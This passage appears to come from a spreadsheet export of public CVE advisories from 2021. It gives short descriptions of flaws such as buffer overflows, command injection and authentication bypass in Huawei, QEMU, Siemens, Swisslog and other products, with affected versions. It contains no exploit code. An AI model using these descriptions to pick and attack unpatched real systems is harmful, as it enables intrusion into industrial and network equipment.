    <t>There is an out of bounds write vulnerability in some Huawei products. The vulnerability is caused by a function of a module that does not properly verify input parameter. Successful exploit could cause out of bounds write leading to a denial of service condition.Affected product versions include:IPS Module V500R005C00,V500R005C20;NGFW Module V500R005C00;NIP6600 V500R005C00,V500R005C20;S12700 V200R010C00SPC600,V200R011C10SPC500,V200R011C10SPC600,V200R013C00SPC500,V200R019C00SPC200,V200R019C00SPC500,V200R019C10SPC200,V200R020C00,V200R020C10;S1700 V200R010C00SPC600,V200R011C10SPC500,V200R011C10SPC600;S2700 V200R010C00SPC600,V200R011C10SPC500,V200R011C10SPC600;S5700 V200R010C00SPC600,V200R010C00SPC700,V200R011C10SPC500,V200R011C10SPC600,V200R019C00SPC500;S6700 V200R010C00SPC600,V200R011C10SPC500,V200R011C10SPC600;S7700 V200R010C00SPC600,V200R010C00SPC700,V200R011C10SPC500,V200R011C10SPC600;S9700 V200R010C00SPC600,V200R011C10SPC500,V200R011C10SPC600;USG9500 V500R005C00,V500R005C20.</t>
  </si>
  <si>
    <t>CVE-2021-3713</t>
  </si>
  <si>
    <t>An out-of-bounds write flaw was found in the UAS (USB Attached SCSI) device emulation of QEMU in versions prior to 6.2.0-rc0. The device uses the guest supplied stream number unchecked, which can lead to out-of-bounds access to the UASDevice-&gt;data3 and UASDevice-&gt;status3 fields. A malicious guest user could use this flaw to crash QEMU or potentially achieve code execution with the privileges of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-37130</t>
  </si>
  <si>
    <t>There is a path traversal vulnerability in Huawei FusionCube 6.0.2.The vulnerability is due to that the software uses external input to construct a pathname that is intended to identify a directory that is located underneath a restricted parent directory, but the software does not properly validate the pathname. Successful exploit could allow the attacker to access a location that is outside of the restricted directory by a crafted filename.</t>
  </si>
  <si>
    <t>CVE-2021-37131</t>
  </si>
  <si>
    <t>There is a CSV injection vulnerability in ManageOne, iManager NetEco and iManager NetEco 6000. An attacker with high privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.</t>
  </si>
  <si>
    <t>CVE-2021-37132</t>
  </si>
  <si>
    <t>PackageManagerService has a Permissions, Privileges, and Access Controls vulnerability .Successful exploitation of this vulnerability may cause that Third-party apps can obtain the complete list of Harmony apps without permission.</t>
  </si>
  <si>
    <t>CVE-2021-37133</t>
  </si>
  <si>
    <t>There is an Unauthorized file access vulnerability in Smartphones.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37134</t>
  </si>
  <si>
    <t>Location-related APIs exists a Race Condition vulnerability.Successful exploitation of this vulnerability may use Higher Permissions for invoking the interface of location-related components.</t>
  </si>
  <si>
    <t>CVE-2021-37136</t>
  </si>
  <si>
    <t>The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack</t>
  </si>
  <si>
    <t>CVE-2021-37137</t>
  </si>
  <si>
    <t>The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.</t>
  </si>
  <si>
    <t>CVE-2021-3714</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernels memory deduplication mechanism. Previous work has shown that memory deduplication can be attacked via a local exploitation mechanism. The same technique can be used if an attacker can upload page sized files and detect the change in access time from a networked service to determine if the page has been merged.</t>
  </si>
  <si>
    <t>CVE-2021-37144</t>
  </si>
  <si>
    <t>CSZ CMS 1.2.9 is vulnerable to Arbitrary File Deletion. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-37145</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** A command-injection vulnerability in an authenticated Telnet connection in Poly (formerly Polycom) CX5500 and CX5100 1.3.5 leads an attacker to Privilege Escalation and Remote Code Execution capability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-37146</t>
  </si>
  <si>
    <t>An infinite loop in Open Robotics ros_comm XMLRPC server in ROS Melodic through 1.4.11 and ROS Noetic through1.15.11 allows remote attackers to cause a Denial of Service in ros_comm via a crafted XMLRPC call.</t>
  </si>
  <si>
    <t>CVE-2021-37147</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-37148</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-37149</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-3715</t>
  </si>
  <si>
    <t>A flaw was found in the "Routing decision" classifier in the Linux kernel's Traffic Control networking subsystem in the way it handled changing of classification filters, leading to a use-after-free condition. This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37150</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to request secure resources. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.</t>
  </si>
  <si>
    <t>CVE-2021-37151</t>
  </si>
  <si>
    <t>CyberArk Identity 21.5.131, when handling an invalid authentication attempt, sometimes reveals whether the username is valid. In certain authentication policy configurations with MFA, the API response length can be used to differentiate between a valid user and an invalid one (aka Username Enumeration). Response differentiation enables attackers to enumerate usernames of valid application users. Attackers can use this information to leverage brute-force and dictionary attacks in order to discover valid account information such as passwords.</t>
  </si>
  <si>
    <t>CVE-2021-37152</t>
  </si>
  <si>
    <t>Multiple XSS issues exist in Sonatype Nexus Repository Manager 3 before 3.33.0. An authenticated attacker with the ability to add HTML files to a repository could redirect users to Nexus Repository Manager’s pages with code modifications.</t>
  </si>
  <si>
    <t>CVE-2021-37153</t>
  </si>
  <si>
    <t>ForgeRock Access Management (AM) before 7.0.2, when configured with Active Directory as the Identity Store, has an authentication-bypass issue.</t>
  </si>
  <si>
    <t>CVE-2021-37154</t>
  </si>
  <si>
    <t>In ForgeRock Access Management (AM) before 7.0.2, the SAML2 implementation allows XML injection, potentially enabling a fraudulent SAML 2.0 assertion.</t>
  </si>
  <si>
    <t>CVE-2021-37155</t>
  </si>
  <si>
    <t>wolfSSL 4.6.x through 4.7.x before 4.8.0 does not produce a failure outcome when the serial number in an OCSP request differs from the serial number in the OCSP response.</t>
  </si>
  <si>
    <t>CVE-2021-37156</t>
  </si>
  <si>
    <t>Redmine 4.2.0 and 4.2.1 allow existing user sessions to continue upon enabling two-factor authentication for the user's account, but the intended behavior is for those sessions to be terminated.</t>
  </si>
  <si>
    <t>CVE-2021-37157</t>
  </si>
  <si>
    <t>An issue was discovered in OpenGamePanel OGP-Agent-Linux through 2021-08-14. $HOME/OGP/Cfg/Config.pm has the root password in cleartext.</t>
  </si>
  <si>
    <t>CVE-2021-37158</t>
  </si>
  <si>
    <t>An issue was discovered in OpenGamePanel OGP-Agent-Linux through 2021-08-14. An authenticated attacker could inject OS commands by starting a Counter-Strike server and using the map field to enter a Bash command.</t>
  </si>
  <si>
    <t>CVE-2021-37159</t>
  </si>
  <si>
    <t>hso_free_net_device in drivers/net/usb/hso.c in the Linux kernel through 5.13.4 calls unregister_netdev without checking for the NETREG_REGISTERED state, leading to a use-after-free and a double free.</t>
  </si>
  <si>
    <t>CVE-2021-3716</t>
  </si>
  <si>
    <t>A flaw was found in nbdkit due to to improperly caching plaintext state across the STARTTLS encryption boundary. A MitM attacker could use this flaw to inject a plaintext NBD_OPT_STRUCTURED_REPLY before proxying everything else a client sends to the server, potentially leading the client to terminate the NBD session. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37160</t>
  </si>
  <si>
    <t>A firmware validation issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. There is no firmware validation (e.g., cryptographic signature validation) during a File Upload for a firmware update.</t>
  </si>
  <si>
    <t>CVE-2021-37161</t>
  </si>
  <si>
    <t>A buffer overflow issue was discovered in the HMI3 Control Panel contained within the Swisslog Healthcare Nexus Panel, operated by released versions of software before Nexus Software 7.2.5.7. A buffer overflow allows an attacker to overwrite an internal queue data structure and can lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37162</t>
  </si>
  <si>
    <t>A buffer overflow issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. If an attacker sends a malformed UDP message, a buffer underflow occurs, leading to an out-of-bounds copy and possible remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37163</t>
  </si>
  <si>
    <t>An insecure permissions issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus operated by released versions of software before Nexus Software 7.2.5.7. The device has two user accounts with passwords that are hardcoded.</t>
  </si>
  <si>
    <t>CVE-2021-37164</t>
  </si>
  <si>
    <t>A buffer overflow issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. In the tcpTxThread function, the received data is copied to a stack buffer. An off-by-3 condition can occur, resulting in a stack-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-37165</t>
  </si>
  <si>
    <t>A buffer overflow issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. When a message is sent to the HMI TCP socket, it is forwarded to the hmiProcessMsg function through the pendingQ, and may lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37166</t>
  </si>
  <si>
    <t>A buffer overflow issue leading to denial of service was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. When HMI3 starts up, it binds a local service to a TCP port on all interfaces of the device, and takes extensive time for the GUI to connect to the TCP socket, allowing the connection to be hijacked by an external attacker.</t>
  </si>
  <si>
    <t>CVE-2021-37167</t>
  </si>
  <si>
    <t>An insecure permissions issue was discovered in HMI3 Control Panel in Swisslog Healthcare Nexus Panel operated by released versions of software before Nexus Software 7.2.5.7. A user logged in using the default credentials can gain root access to the device, which provides permissions for all of the functionality of the device.</t>
  </si>
  <si>
    <t>CVE-2021-3717</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly. An incorrect JBOSS_LOCAL_USER challenge location when using the elytron configuration may lead to JBOSS_LOCAL_USER access to all users on the machine. The highest threat from this vulnerability is to confidentiality, integrity, and availability. This flaw affects wildfly-core versions prior to 17.0.</t>
  </si>
  <si>
    <t>CVE-2021-37172</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (V4.5.0). Affected devices fail to authenticate against configured passwords when provisioned using TIA Portal V13. This could allow an attacker using TIA Portal V13 or later versions to bypass authentication and download arbitrary programs to the PLC. The vulnerability does not occur when TIA Portal V13 SP1 or any later version was used to provision the device.</t>
  </si>
  <si>
    <t>CVE-2021-37173</t>
  </si>
  <si>
    <t>A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1400 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1500 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1501 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1510 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1511 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1512 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1524 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1536 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX5000 (All versions &lt; V2.14.1). The command line interface of affected devices insufficiently restrict file read and write operations for low privileged users. This could allow an authenticated remote attacker to escalate privileges and gain root access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-37174</t>
  </si>
  <si>
    <t>A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1400 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1500 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1501 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1510 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1511 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1512 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1524 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1536 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX5000 (All versions &lt; V2.14.1). The affected devices have a privilege escalation vulnerability, if exploited, an attacker could gain root user access.</t>
  </si>
  <si>
    <t>CVE-2021-37175</t>
  </si>
  <si>
    <t>A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1400 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1500 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1501 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1510 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1511 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1512 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1524 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX1536 (All versions &lt; V2.14.1), RUGGEDCOM ROX RX5000 (All versions &lt; V2.14.1). The affected devices do not properly handle permissions to traverse the file system. If exploited, an attacker could gain access to an overview of the complete file system on the affected devices.</t>
  </si>
  <si>
    <t>CVE-2021-37176</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Simcenter Femap V2020.2 (All versions), Simcenter Femap V2021.1 (All versions). The femap.exe application lacks proper validation of user-supplied data when parsing modfem files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-14260)</t>
  </si>
  <si>
    <t>CVE-2021-37177</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). The status provided by the syslog clients managed by the affected software can be manipulated by an unauthenticated attacker in the same network of the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-37178</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Solid Edge SE2021 (All Versions &lt; SE2021MP7). An XML external entity injection vulnerability in the underlying XML parser could cause the affected application to disclose arbitrary files to remote attackers by loading a specially crafted xml file.</t>
  </si>
  <si>
    <t>CVE-2021-37179</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Solid Edge SE2021 (All Versions &lt; SE2021MP7). The PSKERNEL.dll library in affected application lacks proper validation while parsing user-supplied OBJ files that could lead to a use-after-free condition. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13777)</t>
  </si>
  <si>
    <t>CVE-2021-3718</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in some ThinkPad models that could cause a system to crash when the Enhanced Biometrics setting is enabled in BIOS.</t>
  </si>
  <si>
    <t>CVE-2021-37180</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Solid Edge SE2021 (All Versions &lt; SE2021MP7). The PSKERNEL.dll library lacks proper validation while parsing user-supplied OBJ files that could cause an out of bounds access to an uninitialized pointer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13775)</t>
  </si>
  <si>
    <t>CVE-2021-37181</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Cerberus DMS V4.0 (All versions), Cerberus DMS V4.1 (All versions), Cerberus DMS V4.2 (All versions), Cerberus DMS V5.0 (All versions &lt; v5.0 QU1), Desigo CC Compact V4.0 (All versions), Desigo CC Compact V4.1 (All versions), Desigo CC Compact V4.2 (All versions), Desigo CC Compact V5.0 (All versions &lt; V5.0 QU1), Desigo CC V4.0 (All versions), Desigo CC V4.1 (All versions), Desigo CC V4.2 (All versions), Desigo CC V5.0 (All versions &lt; V5.0 QU1). The application deserialises untrusted data without sufficient validations, that could result in an arbitrary deserialization. This could allow an unauthenticated attacker to execute code in the affected system. The CCOM communication component used for Windows App / Click-Once and IE Web / XBAP client connectivity are affected by the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37182</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SCALANCE XM408-4C (All versions &lt; V6.5), SCALANCE XM408-4C (L3 int.) (All versions &lt; V6.5), SCALANCE XM408-8C (All versions &lt; V6.5), SCALANCE XM408-8C (L3 int.) (All versions &lt; V6.5), SCALANCE XM416-4C (All versions &lt; V6.5), SCALANCE XM416-4C (L3 int.) (All versions &lt; V6.5), SCALANCE XR524-8C, 1x230V (All versions &lt; V6.5), SCALANCE XR524-8C, 1x230V (L3 int.) (All versions &lt; V6.5), SCALANCE XR524-8C, 24V (All versions &lt; V6.5), SCALANCE XR524-8C, 24V (L3 int.) (All versions &lt; V6.5), SCALANCE XR524-8C, 2x230V (All versions &lt; V6.5), SCALANCE XR524-8C, 2x230V (L3 int.) (All versions &lt; V6.5), SCALANCE XR526-8C, 1x230V (All versions &lt; V6.5), SCALANCE XR526-8C, 1x230V (L3 int.) (All versions &lt; V6.5), SCALANCE XR526-8C, 24V (All versions &lt; V6.5), SCALANCE XR526-8C, 24V (L3 int.) (All versions &lt; V6.5), SCALANCE XR526-8C, 2x230V (All versions &lt; V6.5), SCALANCE XR526-8C, 2x230V (L3 int.) (All versions &lt; V6.5), SCALANCE XR528-6M (All versions &lt; V6.5), SCALANCE XR528-6M (2HR2) (All versions &lt; V6.5), SCALANCE XR528-6M (2HR2, L3 int.) (All versions &lt; V6.5), SCALANCE XR528-6M (L3 int.) (All versions &lt; V6.5), SCALANCE XR552-12M (All versions &lt; V6.5), SCALANCE XR552-12M (2HR2) (All versions &lt; V6.5), SCALANCE XR552-12M (2HR2) (All versions &lt; V6.5), SCALANCE XR552-12M (2HR2, L3 int.) (All versions &lt; V6.5). The OSPF protocol implementation in affected devices fails to verify the checksum and length fields in the OSPF LS Update messages. An unauthenticated remote attacker could exploit this vulnerability to cause interruptions in the network by sending specially crafted OSPF packets. Successful exploitation requires OSPF to be enabled on an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-37183</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). The affected software allows sending send-to-sleep notifications to the managed devices. An unauthenticated attacker in the same network of the affected system can abuse these notifications to cause a Denial-of-Service condition in the managed devices.</t>
  </si>
  <si>
    <t>CVE-2021-37184</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Industrial Edge Management (All versions &lt; V1.3). An unauthenticated attacker could change the the password of any user in the system under certain circumstances. With this an attacker could impersonate any valid user on an affected system.</t>
  </si>
  <si>
    <t>CVE-2021-37185</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC Drive Controller family (All versions &gt;= V2.9.2 &lt; V2.9.4), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions &gt;= V21.9 &lt; V21.9.4), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions &gt;= V4.5.0 &lt; V4.5.2), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions &gt;= V2.9.2 &lt; V2.9.4), SIMATIC S7-1500 Software Controller (All versions &gt;= V21.9 &lt; V21.9.4), SIMATIC S7-PLCSIM Advanced (All versions &gt;= V4.0 &lt; V4.0 SP1), TIM 1531 IRC (incl. SIPLUS NET variants) (All versions &gt;= V2.2). An unauthenticated attacker could cause a denial-of-service condition in a PLC when sending specially prepared packets over port 102/tcp. A restart of the affected device is needed to restore normal operations.</t>
  </si>
  <si>
    <t>CVE-2021-37186</t>
  </si>
  <si>
    <t>A vulnerability has been identified in LOGO! CMR2020 (All versions &lt; V2.2), LOGO! CMR2040 (All versions &lt; V2.2), SIMATIC RTU3010C (All versions &lt; V4.0.9), SIMATIC RTU3030C (All versions &lt; V4.0.9), SIMATIC RTU3031C (All versions &lt; V4.0.9), SIMATIC RTU3041C (All versions &lt; V4.0.9). The underlying TCP/IP stack does not properly calculate the random numbers used as ISN (Initial Sequence Numbers). An adjacent attacker with network access to the LAN interface could interfere with traffic, spoof the connection and gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-37187</t>
  </si>
  <si>
    <t>An issue was discovered on Digi TransPort devices through 2021-07-21. An authenticated attacker may read a password file (with reversible passwords) from the device, which allows decoding of other users' passwords.</t>
  </si>
  <si>
    <t>CVE-2021-37188</t>
  </si>
  <si>
    <t>An issue was discovered on Digi TransPort devices through 2021-07-21. An authenticated attacker may load customized firmware (because the bootloader does not verify that it is authentic), changing the behavior of the gateway.</t>
  </si>
  <si>
    <t>CVE-2021-37189</t>
  </si>
  <si>
    <t>An issue was discovered on Digi TransPort Gateway devices through 5.2.13.4. They do not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in cleartext over an HTTP session.</t>
  </si>
  <si>
    <t>CVE-2021-3719</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function that saves and restore boot script tables used for resuming from sleep state in some ThinkCentre and ThinkStation models may allow an attacker with local access and elevated privileges to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-37190</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). The affected software has an information disclosure vulnerability that could allow an attacker to retrieve VPN connection for a known user.</t>
  </si>
  <si>
    <t>CVE-2021-37191</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). An unauthenticated attacker in the same network of the affected system could brute force the usernames from the affected software.</t>
  </si>
  <si>
    <t>CVE-2021-37192</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). The affected software has an information disclosure vulnerability that could allow an attacker to retrieve a list of network devices a known user can manage.</t>
  </si>
  <si>
    <t>CVE-2021-37193</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.0 SP2). An unauthenticated attacker in the same network of the affected system could manipulate certain parameters and set a valid user of the affected software as invalid (or vice-versa).</t>
  </si>
  <si>
    <t>CVE-2021-37194</t>
  </si>
  <si>
    <t>A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS allows to upload and store arbitrary files at the webserver. This could allow an attacker to store malicious files.</t>
  </si>
  <si>
    <t>CVE-2021-37195</t>
  </si>
  <si>
    <t>A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS accepts arbitrary code as attachment to tasks. This could allow an attacker to inject malicious code that is executed when loading the attachment.</t>
  </si>
  <si>
    <t>CVE-2021-37196</t>
  </si>
  <si>
    <t>A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.3 (All versions &gt;= V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS unpacks specially crafted archive files to relative paths. This vulnerability could allow an attacker to store files in any folder accessible by the COMOS Web webservice.</t>
  </si>
  <si>
    <t>CVE-2021-37197</t>
  </si>
  <si>
    <t>A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS is vulnerable to SQL injections. This could allow an attacker to execute arbitrary SQL statements.</t>
  </si>
  <si>
    <t>CVE-2021-37198</t>
  </si>
  <si>
    <t>A vulnerability has been identified in COMOS V10.2 (All versions only if web components are used), COMOS V10.3 (All versions &lt; V10.3.3.3 only if web components are used), COMOS V10.4 (All versions &lt; V10.4.1 only if web components are used). The COMOS Web component of COMOS uses a flawed implementation of CSRF prevention. An attacker could exploit this vulnerability to perform cross-site request forgery attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37199</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINUMERIK 808D (All versions), SINUMERIK 828D (All versions &lt; V4.95). Affected devices don't process correctly certain special crafted packets sent to port 102/tcp, which could allow an attacker to cause a denial-of-service in the device.</t>
  </si>
  <si>
    <t>CVE-2021-3720</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was reported in the Time Weather system widget on Legion Phone Pro (L79031) and Legion Phone2 Pro (L70081) that could allow other applications to access device GPS data.</t>
  </si>
  <si>
    <t>CVE-2021-37200</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP1). An attacker with access to the webserver of an affected system could download arbitrary files from the underlying filesystem by sending a specially crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-37201</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEC NMS (All versions &lt; V1.0 SP1). The web interface of affected devices is vulnerable to a Cross-Site Request Forgery (CSRF) attack. This could allow an attacker to manipulate the SINEC NMS configuration by tricking an unsuspecting user with administrative privileges to click on a malicious link.</t>
  </si>
  <si>
    <t>CVE-2021-37202</t>
  </si>
  <si>
    <t>A vulnerability has been identified in NX 1980 Series (All versions &lt; V1984), Solid Edge SE2021 (All versions &lt; SE2021MP8). The IFC adapter in affected application contains a use-after-free vulnerability that could be triggered while parsing user-supplied IFC files. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-37203</t>
  </si>
  <si>
    <t>A vulnerability has been identified in NX 1980 Series (All versions &lt; V1984), Solid Edge SE2021 (All versions &lt; SE2021MP8). The plmxmlAdapterIFC.dll contains an out-of-bounds read while parsing user supplied IFC files which could result in a read past the end of an allocated buffer. This could allow an attacker to cause a denial-of-service condition or read sensitive information from memory locations.</t>
  </si>
  <si>
    <t>CVE-2021-37204</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC Drive Controller family (All versions &lt; V2.9.2), SIMATIC Drive Controller family (All versions &gt;= V2.9.2 &lt; V2.9.4), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions &lt; V21.9), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions &gt;= V21.9 &lt; V21.9.4), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 Ready4Linux (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions &lt; V4.5.0), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions &gt;= V4.5.0 &lt; V4.5.2), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions &lt; V2.9.2), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions &gt;= V2.9.2 &lt; V2.9.4), SIMATIC S7-1500 Software Controller (All versions &lt; V21.9), SIMATIC S7-1500 Software Controller (All versions &gt;= V21.9 &lt; V21.9.4), SIMATIC S7-PLCSIM Advanced (All versions &lt; V4.0), SIMATIC S7-PLCSIM Advanced (All versions &gt;= V4.0 &lt; V4.0 SP1), TIM 1531 IRC (incl. SIPLUS NET variants) (All versions &gt;= V2.2). An unauthenticated attacker could cause a denial-of-service condition in a PLC when sending specially prepared packet over port 102/tcp. A restart of the affected device is needed to restore normal operations.</t>
  </si>
  <si>
    <t>CVE-2021-37205</t>
  </si>
  <si>
    <t>CVE-2021-37206</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIPROTEC 5 relays with CPU variants CP050 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP100 (All versions &lt; V8.80), SIPROTEC 5 relays with CPU variants CP300 (All versions &lt; V8.80). Received webpackets are not properly processed. An unauthenticated remote attacker with access to any of the Ethernet interfaces could send specially crafted packets to force a restart of the target device.</t>
  </si>
  <si>
    <t>CVE-2021-37207</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SENTRON powermanager V3 (All versions). The affected application assigns improper access rights to a specific folder containing configuration files. This could allow an authenticated local attacker to inject arbitrary code and escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-37208</t>
  </si>
  <si>
